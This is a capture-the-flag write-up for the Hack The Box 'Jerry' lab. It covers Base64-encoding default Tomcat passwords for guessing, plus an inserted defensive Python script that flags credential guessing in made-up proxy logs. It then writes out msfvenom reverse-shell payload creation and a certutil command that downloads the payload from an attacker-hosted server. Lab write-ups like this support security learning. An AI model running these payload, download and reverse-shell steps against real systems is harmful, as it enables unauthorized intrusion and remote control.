Jerry HTB
Enumeration
Exploitation
Using Burp Suite, we find that the password is Base64 encoded:
![[2024-01-30_17-04.png]]
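To do this for all passwords we need a bash command, where `tomcat_passwds.txt` has all default passwords:

```bash
# Base64-encode each line of the wordlist; quoting and printf keep each value intact
while IFS= read -r cred; do printf '%s' "$cred" | base64; done < tomcat_passwds.txt
```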
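Base64 is an encoding, not encryption, so anyone who can see an `Authorization: Basic` header can recover the credentials. The following added example (not part of the original notes) decodes such headers from constructed proxy records and flags credential guessing and accepted default pairs; the `/manager` path prefix, the credential list, the IP addresses and the threshold are illustrative assumptions.

```python
import base64
import binascii
from collections import defaultdict

# Constructed sample of default pairs; replace with your own baseline list.
DEFAULT_PAIRS = {("admin", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret")}

def basic_header(user, password):
    """Build the header value a client sends (used only to make sample data)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

def decode_basic(header):
    """Return (user, password) from an Authorization value, or None if malformed."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")  # password may itself contain ':'
    return (user, password) if sep else None

def review(records, path_prefix="/manager", guess_threshold=3):
    """Flag sources guessing many pairs and any accepted default pair."""
    tried = defaultdict(set)
    findings = []
    for src, path, header, status in records:
        creds = decode_basic(header)
        if creds is None or not path.startswith(path_prefix):
            continue
        tried[src].add(creds)
        if status == 200 and creds in DEFAULT_PAIRS:
            findings.append(("default-credential-accepted", src, creds[0]))
    for src, pairs in tried.items():
        if len(pairs) >= guess_threshold:
            findings.append(("credential-guessing", src, len(pairs)))
    return findings

# Constructed proxy/WAF records: (source IP, path, Authorization, HTTP status).
SAMPLE = [
    ("192.0.2.10", "/manager/html", basic_header("admin", "admin"), 401),
    ("192.0.2.10", "/manager/html", basic_header("tomcat", "tomcat"), 401),
    ("192.0.2.10", "/manager/html", basic_header("tomcat", "s3cret"), 200),
    ("198.51.100.7", "/manager/html", basic_header("ops", "Lu9:xQ2v"), 200),
    ("198.51.100.7", "/manager/html", "Basic ???", 401),
]

if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(finding)
```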
Metasploit
Use

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe
```

to create the payload, then listen using `exploit/multi/handler`.
To upload the payload, host an HTTP server with

```bash
python -m SimpleHTTPServer 80
```

then use

```
certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe
```

in the shell and execute the `meterpreter.exe` file. Then we get a Meterpreter shell.